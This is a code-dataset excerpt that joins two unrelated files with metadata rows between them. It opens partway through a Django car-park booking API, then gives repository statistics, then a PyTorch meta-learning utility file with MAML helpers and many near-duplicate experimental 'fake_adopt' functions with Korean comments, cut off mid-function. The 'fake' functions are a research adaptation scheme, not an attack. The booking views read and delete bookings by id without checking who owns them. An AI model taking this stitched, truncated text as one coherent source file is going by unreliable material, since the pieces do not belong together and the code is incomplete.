'start_time': bay['start_time'],
'end_time': bay['end_time'],
})
return JsonResponse({'success': True, 'bays': baysCleaned}, status=status.HTTP_200_OK)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def bookings(request):
if request.method == 'GET':
bookings = Bookings.objects.all()
bookingsSerializer = BookingsSerializer(bookings, context={'request': request}, many=True)
return Response(bookingsSerializer.data)
elif request.method == 'POST':
"""
{
"booking": {
"carpark": 1,
"date": "2000-01-01", # YYYY-MM-DD
"name": "uniart",
"email": "test@test.com",
"rego": "1234",
"company": "uni",
"phone": 1234,
"user": 1
},
"bays": [
{
"bay": 1,
"start_time": "00:00",
"end_time": "12:00"
},
{
"bay": 2,
"start_time": "00:00",
"end_time": "12:00"
}
]
}
"""
if 'booking' not in request.data:
return JsonResponse({
'error': 'Please supply booking details.'
}, status=status.HTTP_400_BAD_REQUEST)
if 'bays' not in request.data:
return JsonResponse({
'error': 'Please supply bays to be booked.'
}, status=status.HTTP_400_BAD_REQUEST)
booking = request.data['booking']
# Find carpark for booking
try:
carpark = CarPark.objects.get(pk=booking['carpark'])
except CarPark.DoesNotExist:
return JsonResponse({
'error': 'No carpark could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
booking['carpark_id'] = carpark.pk
# Find user for booking
try:
user = User.objects.get(pk=booking['user'])
except User.DoesNotExist:
return JsonResponse({
'error': 'No user could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
booking['user_id'] = user.pk
bookingsSerializer = BookingsSerializer(data=request.data['booking'])
if not bookingsSerializer.is_valid():
return JsonResponse({
'errors': bookingsSerializer.errors
}, status=status.HTTP_400_BAD_REQUEST)
bookingsSerializer.save()
# Save Bays
for bay in request.data['bays']:
try:
CarBay.objects.get(pk=bay['bay'])
except CarBay.DoesNotExist:
return JsonResponse({
'error': 'No Carpark bay could be found given the id.'
}, status=status.HTTP_400_BAD_REQUEST)
bayBooked = bay
bayBooked['booking_id'] = bookingsSerializer.data['pk']
bayBooked['bay_id'] = bay['bay']
baysBookedSerializer = BaysBookedSerializer(data=bayBooked)
if not baysBookedSerializer.is_valid():
return JsonResponse({
'errors': baysBookedSerializer.errors
}, status=status.HTTP_400_BAD_REQUEST)
baysBookedSerializer.save()
# Send email
booking = bookingsSerializer.data
if log_and_send_mail(
subject="Your UniPark Booking",
to_email=[request.data['booking']['email']],
category="EmailBooking",
template="emails/booking.html",
data={
"booking": booking,
"carpark": booking['carpark'],
"bays": BaysBooked.objects.filter(booking__id=booking['pk']),
"user": booking['user'],
},
):
return JsonResponse({'success': True, 'booking_id': bookingsSerializer.data['pk']},
status=status.HTTP_201_CREATED)
else:
return JsonResponse({
'error': 'Something went wrong when sending email.'
}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'DELETE'])
def booking(request, pk):
if request.method == 'GET':
try:
booking = Bookings.objects.get(pk=pk)
except Bookings.DoesNotExist:
return JsonResponse({'error': 'Booking cannot be found.'}, status=status.HTTP_400_BAD_REQUEST)
bookingsSerializer = BookingsSerializer(booking, context={'request': request})
try:
bays = BaysBooked.objects.filter(booking__id=pk)
except Bookings.DoesNotExist:
return JsonResponse({'error': 'No bays can be found for this booking.'}, status=status.HTTP_400_BAD_REQUEST)
baysBookedSerializer = BaysBookedSerializer(bays, context={'request': request}, many=True)
baysCleaned = []
for bay in baysBookedSerializer.data:
baysCleaned.append({
'pk': bay['pk'],
'bay': bay['bay'],
'start_time': bay['start_time'],
'end_time': bay['end_time'],
})
return JsonResponse({'booking': bookingsSerializer.data, 'bays': baysCleaned}, status=status.HTTP_200_OK)
if request.method == 'DELETE':
booking = Bookings.objects.get(pk=pk)
booking.delete()
bays = BaysBooked.objects.filter(booking__id=pk)
for bay in bays:
bay.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
| 36.292308
| 120
| 0.603815
| 0
| 0
| 0
| 0
| 11,222
| 0.95142
| 0
| 0
| 2,271
| 0.192539
|
c068ebb6bccce46da01fec0d1da4f714e0e2357e
| 33,949
|
py
|
Python
|
utils.py
|
eepLearning/learn2learn
|
4ed48e69f1ca5c9508331e15fd4a8f65c3cae750
|
[
"MIT"
] | null | null | null |
utils.py
|
eepLearning/learn2learn
|
4ed48e69f1ca5c9508331e15fd4a8f65c3cae750
|
[
"MIT"
] | null | null | null |
utils.py
|
eepLearning/learn2learn
|
4ed48e69f1ca5c9508331e15fd4a8f65c3cae750
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from torch.autograd import grad
from learn2learn.utils import clone_module, update_module
from torch import nn, optim
def maml_update(model, lr, grads=None):
"""
[[Source]](https://github.com/learnables/learn2learn/blob/master/learn2learn/algorithms/maml.py)
**Description**
Performs a MAML update on model using grads and lr.
The function re-routes the Python object, thus avoiding in-place
operations.
NOTE: The model itself is updated in-place (no deepcopy), but the
parameters' tensors are not.
**Arguments**
* **model** (Module) - The model to update.
* **lr** (float) - The learning rate used to update the model.
* **grads** (list, *optional*, default=None) - A list of gradients for each parameter
of the model. If None, will use the gradients in .grad attributes.
**Example**
~~~python
maml = l2l.algorithms.MAML(Model(), lr=0.1)
model = maml.clone() # The next two lines essentially implement model.adapt(loss)
grads = autograd.grad(loss, model.parameters(), create_graph=True)
maml_update(model, lr=0.1, grads)
~~~
"""
if grads is not None:
params = list(model.parameters())
if not len(grads) == len(list(params)):
msg = 'WARNING:maml_update(): Parameters and gradients have different length. ('
msg += str(len(params)) + ' vs ' + str(len(grads)) + ')'
print(msg)
for p, g in zip(params, grads):
if g is not None:
p.update = - lr * g
return update_module(model)
def accuracy(predictions, targets):
predictions = predictions.argmax(dim=1).view(targets.shape)
return (predictions == targets).sum().float() / targets.size(0)
def fast_adapt(batch, learner, loss, adaptation_steps, shots, ways, device):
data, labels = batch
data, labels = data.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error) # update
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy
# Adapt the model #support loss
def fake_adopt_debug2(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task):
data, labels = batch
data, labels = data.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
loss2 = nn.CrossEntropyLoss(reduction='none')
# Adapt the model #support loss
for step in range(adaptation_steps):
train_error = loss2(learner(adaptation_data), adaptation_labels)
# learner.adapt(train_error) #update
mean_seperate_error = torch.mean(train_error)
grads = grad(mean_seperate_error, learner.parameters(), create_graph=True)
updates = [-learner.lr * g for g in grads]
update_module(learner, updates=updates)
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy,{"2":[3]},{"2":[3]}
def fake_adopt_before(batch, learner, loss, adaptation_steps, shots, ways, device, error_dict, error_data, task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
train_error = 0
print("adaptation_labels)", adaptation_labels)
for step in range(adaptation_steps):
for (one_class_data, one_class_label) in zip(adaptation_data, adaptation_labels):
print("one_class_label: ", one_class_label)
one_class_data = one_class_data.unsqueeze(0)
one_class_label = one_class_label.unsqueeze(0)
print("one_class_label:(unsquzee) ", one_class_label)
one_class_loss = loss(learner(one_class_data), one_class_label)
grads = grad(one_class_loss / 5, learner.parameters(), allow_unused=False)
error_dict[task].append(grads)
train_error += one_class_loss
# print("one class label loss :",one_class_loss)
# print("mean train error :",train_error/5)
original_error = loss(learner(adaptation_data), adaptation_labels)
# print("original train error : ",original_error)
# print("@@@@@@@@@@@@@@@@@@@debug loss")
# fine-tune
# learner.adapt(train_error)
for g in error_dict[task]:
learner = maml_update(learner, learner.lr, g)
# Evaluate the adapted model
error_data[task] = evaluation_data, evaluation_labels
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def fake_adopt_now(learner, fake_grads, loss, error_data, task):
for g in fake_grads:
learner = maml_update(learner, learner.lr, g)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
def fake_adopt_debug(batch, learner, loss, adaptation_steps, shots, ways, device, error_dict, error_data, task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
train_error = []
# print("adaptation_labels)", adaptation_labels)
for step in range(adaptation_steps):
for (one_class_data, one_class_label) in zip(adaptation_data, adaptation_labels):
# print("one_class_label: ", one_class_label)
# print("one_class_label:(unsquzee) ", one_class_label)
# 주석처리
one_class_data = one_class_data.unsqueeze(0)
one_class_label = one_class_label.unsqueeze(0)
one_class_loss = loss(learner(one_class_data), one_class_label)
grads = grad(one_class_loss / 5, learner.parameters(), create_graph=True)
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error.append(one_class_loss)
# print("one class label loss :",one_class_loss)
# print("mean train error :",train_error/5)
# original_error = loss(learner(adaptation_data), adaptation_labels)
# print("original train error : ",original_error)
# print("@@@@@@@@@@@@@@@@@@@debug loss")
# fine-tune
# learner.adapt(train_error)
# 1차 시도
# for g in error_dict[task]:
# learner = maml_update(learner, learner.lr, g)
# 2차 시도
# for u in error_dict[task]:
# update_module(learner,updates = u)
# 3차 시도
# grads = grad(train_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# 4차 시도
# grads = grad(original_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# 5차 시도
# mean_error = torch.mean(torch.stack(train_error))
# grads = grad(mean_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# 6차 시도
# mean_error = torch.mean(torch.stack(train_error))
# grads = grad(mean_error, learner.parameters(), create_graph=True)
# updates = [-learner.lr * g for g in grads]
# update_module(learner, updates=updates)
# Evaluate the adapted model
error_data[task] = evaluation_data, evaluation_labels
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def evaluate(test_iteration, maml, task_information):
tasksets, meta_batch_size, loss, adaptation_steps, shots, ways, device = task_information
test_error = []
test_accuracy = []
for i in range(test_iteration):
meta_test_error = 0.0
meta_test_accuracy = 0.0
# Compute meta-testing loss
learner = maml.clone()
batch = tasksets.test.sample()
# print("batch",len(batch))
evaluation_error, evaluation_accuracy = fast_adapt(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device)
meta_test_error += evaluation_error.item()
meta_test_accuracy += evaluation_accuracy.item()
test_error.append(meta_test_error)
test_accuracy.append(meta_test_accuracy)
# print('Meta Test Error', meta_test_error / meta_batch_size)
# print('Meta Test Accuracy', meta_test_accuracy / meta_batch_size)
test_error_mean = np.mean(test_error)
test_accuracy_mean = np.mean(test_accuracy)
test_error_std = np.std(test_error)
test_accuracy_std = np.std(test_accuracy)
print('Meta Test Error(Iteration Record)', test_error_mean)
print('Meta Test Accuracy(Iteration Record)', test_accuracy_mean)
return test_error_mean, test_error_std, test_accuracy_mean, test_accuracy_std
####new fake adopt 1
def fake_adopt_1_before(batch,
learner,
loss,
adaptation_steps,
shots, ways, device,
error_dict, error_data,
task):
datas, labels = batch
datas, labels = datas.to(device), labels.to(device)
# Separate data into adaptation/evalutation sets
adaptation_indices = np.zeros(datas.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
# print("evaluation_indices",evaluation_indices)
# print("adaptation_indices", adaptation_indices)
adaptation_data, adaptation_labels = datas[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = datas[evaluation_indices], labels[evaluation_indices]
# Adapt the model
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# Evaluate the adapted model
predictions = learner(evaluation_data)
# query loss
evaluation_error = loss(predictions, evaluation_labels)
evaluation_accuracy = accuracy(predictions, evaluation_labels)
return evaluation_error, evaluation_accuracy, error_dict, error_data
def fake_adopt_1_now(learner, fake_grads, loss, error_data, task):
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#####fake_adopt 3
def fake_adopt_3_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if iteration % 49 == 0:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_3_now(learner, fake_grads, loss, error_data, task):
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 4
def fake_adopt_4_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if iteration % 9 == 0:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
#grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
#updates = [-learner.lr * g for g in grads]
error_dict[task].append(il)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_4_now(learner, fake_grads, loss, error_data, task):
#for in fake_grads:
#update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 5
def fake_adopt_5_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration,split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_5_now(learner, fake_grads, loss, error_data, task):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 6
def fake_adopt_6_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration,split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_6_now(learner, fake_grads, loss, error_data, task):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates)
query_data, query_label = error_data[task]
predictions = learner(query_data)
# query loss
evaluation_error = loss(predictions, query_label)
return evaluation_error
#############fake adopt 7 (랩미팅 피드백)
# 50% 정상 + 50% fake
# 50 % 전반 client 정상적 진행
# 50 % 후반 client 가지고 fake 진행행
def fake_adopt_7_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
#후반 50% client fake 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
#정상적인 진행 :전반 50% client
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_7_now(learner, fake_grads, loss, error_data, task,label_index,client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) #일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
#Client로 접근
error_list = []
for idx,client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data),query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
#fake7 : 1차 시도
#그냥 지금까지 실패했던 것처럼 로직만 짜고 러프하게 loss 일일이 구해서 그것들을 평균내는 방식으로
#산출 , 실패 예상 => 사실 이게 되면 제일 깔끔
#엥 돌아가버리네 이게??
#############fake adopt 8 (랩미팅 피드백)
# 50% 정상 + 50% fake
# 50 % 전반 client 정상적 진행
# 50 % 전반 client 가지고 fake 진행행
def fake_adopt_8_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
#초반 50% client를 가지고 grads 저장 + 정상적인 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_8_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) # 일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
# Client로 접근
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
##0812에 구현
#############fake adopt 9 (공동 랩미팅 피드백)
# 50% 정상 + 50% fake
# 50 % 전반 client 정상적 진행
# 50 % 후반 client 가지고 fake 진행행
# + 인덱싱 (support grad / query loss)
# + class 비복원추출
def fake_adopt_9_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
if task >= split_meta_batch_size:
# 후반 50% client fake 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
valid_error = torch.tensor([0])
valid_accuracy = torch.tensor([0])
else:
# 정상적인 진행 :전반 50% client
for step in range(adaptation_steps):
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_9_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
for updates in fake_grads:
update_module(learner, updates=updates) # 일단 fake adaptation
loss2 = nn.CrossEntropyLoss(reduction='none')
# Client로 접근
error_list = []
for idx, client in enumerate(client_index):
query_data, query_label = error_data[client]
label = label_index[idx]
individual_query_loss = loss2(learner(query_data), query_label)[label]
error_list.append(individual_query_loss)
evaluation_error = torch.mean(torch.stack(error_list))
return evaluation_error
# fake7 : 1차 시도
# 그냥 지금까지 실패했던 것처럼 로직만 짜고 러프하게 loss 일일이 구해서 그것들을 평균내는 방식으로
# 산출 , 실패 예상 => 사실 이게 되면 제일 깔끔
# 엥 돌아가버리네 이게??
#############fake adopt 8 (랩미팅 피드백)
# 50% 정상 + 50% fake
# 50 % 전반 client 정상적 진행
# 50 % 전반 client 가지고 fake 진행행
def fake_adopt_10_before(batch,
learner,
loss,
adaptation_steps,
shots,
ways,
device,
error_dict,
error_data,
task, iteration, split_meta_batch_size):
data, labels = batch
data, labels = data.to(device), labels.to(device)
adaptation_indices = np.zeros(data.size(0), dtype=bool)
adaptation_indices[np.arange(shots * ways) * 2] = True
evaluation_indices = torch.from_numpy(~adaptation_indices)
adaptation_indices = torch.from_numpy(adaptation_indices)
adaptation_data, adaptation_labels = data[adaptation_indices], labels[adaptation_indices]
evaluation_data, evaluation_labels = data[evaluation_indices], labels[evaluation_indices]
# Adapt the model #support loss
# 초반 50% client를 가지고 grads 저장 + 정상적인 진행
loss2 = nn.CrossEntropyLoss(reduction='none')
for step in range(adaptation_steps):
individual_loss = loss2(learner(adaptation_data), adaptation_labels)
for il in individual_loss:
grads = grad(il, learner.parameters(), retain_graph=True) # 이거 안하면 끝나고 free되서 오류남
updates = [-learner.lr * g for g in grads]
error_dict[task].append(updates)
train_error = loss(learner(adaptation_data), adaptation_labels)
learner.adapt(train_error)
error_data[task] = evaluation_data, evaluation_labels
# train_error = torch.mean(individual_loss)
# learner.adapt(train_error)
predictions = learner(evaluation_data)
valid_error = loss(predictions, evaluation_labels)
valid_accuracy = accuracy(predictions, evaluation_labels)
return valid_error, valid_accuracy, error_dict, error_data
def fake_adopt_10_now(learner, fake_grads, loss, error_data, task, label_index, client_index):
# for in fake_grads:
# update_module(learner, updates=updates)
